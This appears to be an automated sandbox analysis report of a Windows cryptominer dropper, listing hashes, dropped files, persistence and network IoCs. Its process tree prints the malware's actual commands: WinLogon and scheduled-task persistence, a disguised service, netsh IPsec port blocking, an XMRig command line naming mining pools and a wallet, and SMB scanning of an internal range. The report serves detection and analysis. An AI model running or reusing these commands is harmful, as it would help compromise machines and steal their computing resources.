Analysis
max time kernel: 151s
max time network: 156s
platform: windows7_x64
resource: win7-20220414-en
submitted: 19-05-2022 01:41
Behavioral task behavioral1: sample aa.exe, resource win7-20220414-en
Behavioral task behavioral2: sample aa.exe, resource win10v2004-20220414-en
General
Target: aa.exe
Size: 28.1MB
MD5: f9b2e96e5044fdaa7d923d516f6206e8
SHA1: 936f9c88a574fede2fd37e54189e4b69c1215163
SHA256: b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512: c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\YVZLX\\JOifcy.exe" | JOifcy.exe
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 9 IoCs
Processes:
resource | yara_rule
\Windows\YVZLX\JOifcy.exe | xmrig
\Windows\YVZLX\JOifcy.exe | xmrig
C:\Windows\YVZLX\JOifcy.exe | xmrig
C:\Windows\YVZLX\JOifcy.exe | xmrig
behavioral1/memory/1788-62-0x0000000000400000-0x0000000002054000-memory.dmp | xmrig
\Windows\YVZLX\dC.exe | xmrig
C:\Windows\YVZLX\dC.exe | xmrig
\Windows\YVZLX\dC.exe | xmrig
behavioral1/memory/1492-147-0x0000000000400000-0x0000000002054000-memory.dmp | xmrig
Creates new service(s) 1 TTPs
-
Executes dropped EXE 4 IoCs
Processes:
pid | process
1492 | JOifcy.exe
1512 | dC.exe
2076 | svchost.exe
2160 | svchost.exe
-
Deletes itself 1 IoCs
Processes:
pid | process
624 | cmd.exe
-
Loads dropped DLL 8 IoCs
Processes:
pid | process
1788 | aa.exe
1788 | aa.exe
1492 | JOifcy.exe
1720 |
1808 | cmd.exe
1808 | cmd.exe
2124 | cmd.exe
2124 | cmd.exe
Drops file in Windows directory 64 IoCs
Processes:
description | ioc | process
File created | C:\Windows\YVZLX\etch-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\riar.dll | JOifcy.exe
File created | C:\Windows\YVZLX\chrome..fb | JOifcy.exe
File created | C:\Windows\YVZLX\adfw.dll | JOifcy.exe
File created | C:\Windows\YVZLX\libxml2.dll | JOifcy.exe
File created | C:\Windows\YVZLX\posh-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\ucl.dll | JOifcy.exe
File created | C:\Windows\YVZLX\s.bat | JOifcy.exe
File created | C:\Windows\YVZLX\tscl.html | aa.exe
File created | C:\Windows\YVZLX\tibe-1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\tibe-2.dll | JOifcy.exe
File opened for modification | C:\Windows\YVZLX\tscl.html | JOifcy.exe
File created | C:\Windows\YVZLX\ssleay32.dll | JOifcy.exe
File created | C:\Windows\YVZLX\eteb-2.dll | JOifcy.exe
File created | C:\Windows\YVZLX\pcla-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\WinRing0x64.sys | JOifcy.exe
File created | C:\Windows\YVZLX\Cstr.xml | JOifcy.exe
File created | C:\Windows\YVZLX\Cstr.exe | JOifcy.exe
File created | C:\Windows\YVZLX\adfw-2.dll | JOifcy.exe
File opened for modification | C:\Windows\YVZLX\svchost.exe | JOifcy.exe
File created | C:\Windows\boy.exe | aa.exe
File created | C:\Windows\YVZLX\libcurl.dll | JOifcy.exe
File created | C:\Windows\YVZLX\trfo.dll | JOifcy.exe
File created | C:\Windows\YVZLX\chrome..exe | JOifcy.exe
File created | C:\Windows\YVZLX\libiconv-2.dll | JOifcy.exe
File created | C:\Windows\YVZLX\trch-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\exma.dll | JOifcy.exe
File created | C:\Windows\YVZLX\dmgd-4.dll | JOifcy.exe
File created | C:\Windows\YVZLX\exma-1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\pcreposix-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\svchost.exe | JOifcy.exe
File opened for modification | C:\Windows\YVZLX\s.bat | JOifcy.exe
File created | C:\Windows\YVZLX\coli-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\esco-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\tibe.dll | JOifcy.exe
File created | C:\Windows\YVZLX\trfo-0.dll | JOifcy.exe
File created | C:\Windows\IME\tps.exe | aa.exe
File created | C:\Windows\YVZLX\etchCore-0.x86.dll | JOifcy.exe
File created | C:\Windows\YVZLX\chrome..xml | JOifcy.exe
File created | C:\Windows\YVZLX\trch-1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\dC.exe | JOifcy.exe
File created | C:\Windows\YVZLX\qdx.bat | JOifcy.exe
File created | C:\Windows\YVZLX\cnli-1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\riar-2.dll | JOifcy.exe
File created | C:\Windows\YVZLX\zlib1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\cnli-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\crli-0.dll | JOifcy.exe
File created | C:\Windows\YVZLX\etchCore-0.x64.dll | JOifcy.exe
File created | C:\Windows\YVZLX\etebCore-2.x86.dll | JOifcy.exe
File created | C:\Windows\YVZLX\iconv.dll | JOifcy.exe
File created | C:\Windows\YVZLX\libeay32.dll | JOifcy.exe
File created | C:\Windows\YVZLX\pcrecpp-0.dll | JOifcy.exe
File opened for modification | C:\Windows\YVZLX\Result.txt | svchost.exe
File created | C:\Windows\end.bat | JOifcy.exe
File created | C:\Windows\YVZLX\Cstr.fb | JOifcy.exe
File created | C:\Windows\YVZLX\dmgd-1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\etebCore-2.x64.dll | JOifcy.exe
File created | C:\Windows\YVZLX\tucl-1.dll | JOifcy.exe
File created | C:\Windows\YVZLX\JOifcy.exe | aa.exe
File created | C:\Windows\YVZLX\posh.dll | JOifcy.exe
File created | C:\Windows\YVZLX\trfo-2.dll | JOifcy.exe
File created | C:\Windows\YVZLX\tucl.dll | JOifcy.exe
File created | C:\Windows\YVZLX\zibe.dll | JOifcy.exe
File created | C:\Windows\YVZLX\ip.dll | JOifcy.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 51 IoCs
Processes:
pid | process
1492 | JOifcy.exe (the same row is logged 51 times)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
468 |
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeLockMemoryPrivilege | 1512 | dC.exe
Token: SeLockMemoryPrivilege | 1512 | dC.exe
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
pid | process
1788 | aa.exe
1788 | aa.exe
1492 | JOifcy.exe
1492 | JOifcy.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (each row below is logged 4 times)
PID 1788 wrote to memory of 1492 | 1788 | aa.exe | JOifcy.exe
PID 1788 wrote to memory of 624 | 1788 | aa.exe | cmd.exe
PID 1492 wrote to memory of 1400 | 1492 | JOifcy.exe | cmd.exe
PID 1400 wrote to memory of 764 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 776 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 1780 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 544 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 1248 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 1288 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 856 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 240 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 1608 | 1400 | cmd.exe | netsh.exe
PID 1400 wrote to memory of 1728 | 1400 | cmd.exe | netsh.exe
PID 1492 wrote to memory of 1004 | 1492 | JOifcy.exe | cmd.exe
PID 1492 wrote to memory of 1332 | 1492 | JOifcy.exe | cmd.exe
PID 1004 wrote to memory of 832 | 1004 | cmd.exe | netsh.exe
Processes
(indented to show the process tree; each entry gives the image path, its command line, and the signatures it triggered)

C:\Users\Admin\AppData\Local\Temp\aa.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\aa.exe"
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\YVZLX\JOifcy.exe
    command line: C:\Windows\YVZLX\JOifcy.exe
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\end.bat" "
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add policy name=ipsec_ply

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filterlist name=deny_pt

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filterlist name=allow_pt

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filteraction name=deny action=block

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filteraction name=allow action=negotiate

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static set policy name=ipsec_ply assign=y

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\end.bat" "
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add policy name=ipsec_ply

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filterlist name=deny_pt

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filterlist name=allow_pt

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filteraction name=deny action=block

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filteraction name=allow action=negotiate

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static set policy name=ipsec_ply assign=y

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\end.bat" "

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add policy name=ipsec_ply

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filterlist name=deny_pt

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filterlist name=allow_pt

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filteraction name=deny action=block

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add filteraction name=allow action=negotiate

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"

      C:\Windows\SysWOW64\netsh.exe
        command line: netsh ipsec static set policy name=ipsec_ply assign=y

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\end.bat" "

    C:\Windows\SysWOW64\sc.exe
      command line: sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\YVZLX\qdx.bat" "

      C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\YVZLX\JOifcy.exe" /SC ONSTART
        - Creates scheduled task(s)

    C:\Windows\YVZLX\dC.exe
      command line: "C:\Windows\YVZLX\dC.exe" -o stratum+tcp://wk.monerogx.com:6502 -o stratum+tcp://note.monerogx.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\YVZLX\s.bat" "
      - Loads dropped DLL

      C:\Windows\YVZLX\svchost.exe
        command line: svchost.exe syn 10.127.0.0 10.127.255.255 445 /save
        - Executes dropped EXE

    C:\Windows\SysWOW64\cmd.exe
      command line: cmd /c ""C:\Windows\YVZLX\s.bat" "
      - Loads dropped DLL

      C:\Windows\YVZLX\svchost.exe
        command line: svchost.exe tcp 10.127.0.0 10.127.255.255 445 450 /save
        - Executes dropped EXE
        - Drops file in Windows directory

  C:\Windows\SysWOW64\cmd.exe
    command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
    - Deletes itself
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Windows\YVZLX\JOifcy.exe (28.1MB)
MD5: f9b2e96e5044fdaa7d923d516f6206e8
SHA1: 936f9c88a574fede2fd37e54189e4b69c1215163
SHA256: b8a09b445da4d1904cd5b184ffbf3e994ab137360131f89af3c08e3e9756c63a
SHA512: c4e622c9e88c5cef755abbc08db1368bc4656e80a349e5920566c003d7f800d0a4cf1f3164d18a87f42d5269f39089f2a2d0894f622fbede0930b66a827c77a1
-
C:\Windows\YVZLX\dC.exe (6.8MB)
MD5: 90f9e1fdec81ccf508fc58f3d23156b5
SHA1: 066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256: d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA512: 8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
C:\Windows\YVZLX\qdx.bat (116B)
MD5: 9c34c98dff5bd8f258dadd08e5d45d89
SHA1: 127dd3b015b860d4ed61011a382a4e32fbac9f82
SHA256: 45c6862ce8304f27134577563eda26c320f08caa5797c33ae1765acbe464637f
SHA512: 4650a0c32df7fe761804651c108b6058459fedc85aeba47bf222f780a2554e1dca62515528ff80ea6c208553726f1df97d343dcca90d6697cbf852b085e18d9f
-
C:\Windows\YVZLX\s.bat (335B)
MD5: b5f17481d6d186362e1b989d59f4485b
SHA1: 286e596314689831c647c43a2d7258e7704062bb
SHA256: 92d3d97610deea1906de9c1303e5928808d65c1bb6b0653613e13c0fa81a91f5
SHA512: 5918ae4392e4b7b381426cd121478e12e2f7abbab3bbdeba5f383231aaff25436442f34a8735bc8efa3ab422650cccaf03fcaf22d627a0c10e5e1adbdacb9698
-
C:\Windows\YVZLX\s.bat (338B)
MD5: 8e1fa5b53b2321b93a89316b11ed845b
SHA1: 86254840496799d0ee5aafc225ceee6864d12b22
SHA256: e1e488051d8e7d68f52ff6e94b11c7ab24d23859effe38b0a274cdb9a5b912e8
SHA512: 92ba0019615a0f5b7fa950683d6e00f02103e7ac964d4e58d8d0682d9a2bc4a0566c9f7cb7db1a24e7cbb9b056738d7ab65873cb545d03c6d8bd4ee542240653
-
C:\Windows\YVZLX\svchost.exe (14KB)
MD5: c097fd043d3cbabcada0878505c7afa5
SHA1: 966a60028a3a24268c049ffadbe1a07b83de24ce
SHA256: 1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA512: 0837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\YVZLX\tscl.html (6B)
MD5: 82ca5289b507fb42fd3c3f957b240626
SHA1: 198b418473a770773cc5265c0f263655c4c4022f
SHA256: 3eafb956900ebaf7bf7e18555e823bf227c51962d06ca5c05c9b2d889d69f62e
SHA512: d9cd1ad6bcffe6a155e471d2cea8e9ffac44a5ca5da9716871a4fdfda5c852182da5f1e5af3712abb0b382846db90c326faba91e95416ec9e283781560ebeb97
-
C:\Windows\end.bat (1KB)
MD5: c017d5f762ae5d67efb7d099b53cca58
SHA1: ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256: d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512: 856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78